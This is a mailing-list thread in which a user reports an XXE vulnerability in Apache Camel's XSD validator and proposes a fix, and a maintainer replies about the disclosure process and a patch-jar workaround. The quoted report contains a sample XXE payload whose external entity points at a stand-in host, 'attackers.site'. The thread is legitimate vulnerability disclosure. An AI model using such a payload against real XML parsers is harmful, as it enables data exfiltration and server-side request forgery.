Hi Karel, Normally we talk about this kind of issue in the private mailing list[1]. As you already provide a fix for it, you can send a PR [2] with the fix as the contribution document[3] suggested. I'd happy to apply it into camel-core.
I'm not sure how did you deploy the camel application. Normally you can create a patch jar which just has the fixed classed and put it as the first element in the class path to override the old version of Camel class. [1]https://www.apache.org/security/#reporting-a-vulnerability [2]https://github.com/apache/camel [3]https://github.com/apache/camel/blob/master/CONTRIBUTING.md Willem Jiang Blog: http://willemjiang.blogspot.com (English) http://jnn.iteye.com (Chinese) Twitter: willemjiang Weibo: 姜宁willem On Sat, Apr 14, 2018 at 7:23 PM, Karel Jelínek <karel.jeli...@unicorn.com> wrote: > Dear All, > we are using XSD validation processor by camel-core library > > ... > .to("validator:classpath:xsd/exportenv70.xsd") > ... > > Our penetration tests found that application can be attacked by "XML > External Entity (XXE)" (https://www.owasp.org/index.p > hp/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet#Validator) > > We think that classes infected by this vulnerability are > > org.apache.camel.processor.validation.SchemaReader.java > org.apache.camel.processor.validation.ValidatingProcessor.java > > Method SchemaReader.createSchemaFactory should also set property > "factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");" > > Method ValidatingProcessor.doProcess should set property to validator class > > Validator validator = schema.newValidator(); > //prevent XXE attack > validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, ""); > validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, ""); > > If we try to validate infected XML against XSD we can see that camel is > trying to access external site (attackers.site) in this example > > <?xml version="1.0" encoding="utf-8"?> > <!DOCTYPE root [ > <!ENTITY % remote SYSTEM "http://attackers.site:53/TEST"> > %remote; > %run; > %trick;]> > > Disabling mentioned properties should do the trick > > https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Pr > evention_Cheat_Sheet#Validator > > > I would like to ask you if this will be created as a security BUG in camel > and if it will be fixed in the future version? > > Can we use some workaround? Write our custom implementation of > ValidatingProcessor? Is it possible? > > -- > > Best regards > > Karel Jelínek > Unicorn Systems > https://unicorn.com/ >